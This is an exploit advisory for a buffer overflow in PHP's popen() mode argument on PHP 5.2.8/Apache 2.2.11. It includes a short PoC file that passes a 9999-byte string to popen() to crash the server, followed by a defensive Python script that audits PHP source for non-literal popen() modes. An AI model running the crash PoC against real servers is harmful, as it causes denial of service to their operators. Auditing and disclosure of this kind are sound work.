PHP popen function buffer overflow exploit for Apache 2.2.11/PHP 5.2.
`Apache 2.2.11/PHP 5.2.8 Buffer Overflow Exploit (popen func)
Type: Remote and Local
Requirements for exploit: popen() enabled.
By: e.wiZz! [email protected] najjaci.net
PHP Popen() function overview:
The popen() function in PHP opens a pipe to a process executed by forking the command given by command.
It has been implemented since PHP 4.
popen ( string $command_to_execute , string $mode )
The second argument is vulnerable to a buffer overflow. The reason why I mentioned Apache here is because
when we execute poc.php the Apache HTTP server crashes without any report in the error log. You can test on WAMP too, on CLI or browser.
Tested on: PHP 5.2.8/4.2.1/4.2.0
Apache 2.2.11
########### wild.php ################
<?php
$____buff=str_repeat("A",9999);
$handle = popen('/whatever/', $____buff);
echo $handle;
?>
`
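Added example, not part of the original advisory: a Python audit script that lists popen() call sites in PHP source whose second argument (the one the advisory identifies as vulnerable) is anything other than a short literal mode. The function names, the SAFE_MODES allowlist and the sample source are assumptions constructed for illustration.

```python
import re

SAFE_MODES = {"r", "w", "rb", "wb"}  # assumed allowlist of literal modes
CALL = re.compile(r"(?<![\w>:$])popen\s*\(", re.IGNORECASE)  # not ->popen( or my_popen(

def split_args(src, start):
    """Split the top-level arguments of a call; start is the index after '('."""
    args, cur, depth, quote, i = [], [], 0, None, start
    while i < len(src):
        ch = src[i]
        if quote:                       # inside a string literal
            if ch == "\\":              # keep the escaped character with it
                ch = src[i:i + 2]
                i += 1
            elif ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        elif ch in "([":
            depth += 1
        elif ch in ")]":
            if depth == 0:              # closing paren of the popen() call
                return args + ["".join(cur).strip()]
            depth -= 1
        elif ch == "," and depth == 0:  # argument separator
            args.append("".join(cur).strip())
            cur, ch = [], ""
        cur.append(ch)
        i += 1
    return args                         # unterminated call

def audit_popen(src):
    """Return (line, mode_expression) for calls whose mode is not a safe literal."""
    findings = []
    for m in CALL.finditer(src):
        args = split_args(src, m.end())
        mode = args[1] if len(args) > 1 else ""
        literal = re.fullmatch(r"""(['"])([^'"\\$]*)\1""", mode)
        if not (literal and literal.group(2) in SAFE_MODES):
            findings.append((src.count("\n", 0, m.start()) + 1, mode))
    return findings

# Constructed sample input; line 3 mirrors the call shape shown in the advisory.
SAMPLE = '''<?php
$h1 = popen('/usr/bin/uptime', 'r');
$h2 = popen('/whatever/', $____buff);
$h3 = popen(build_cmd($a, "x,y"), $_GET['mode']);
'''
```

The scan is text-based, so a popen( inside a PHP comment or string is also reported; treat each finding as a call site to review rather than a confirmed issue.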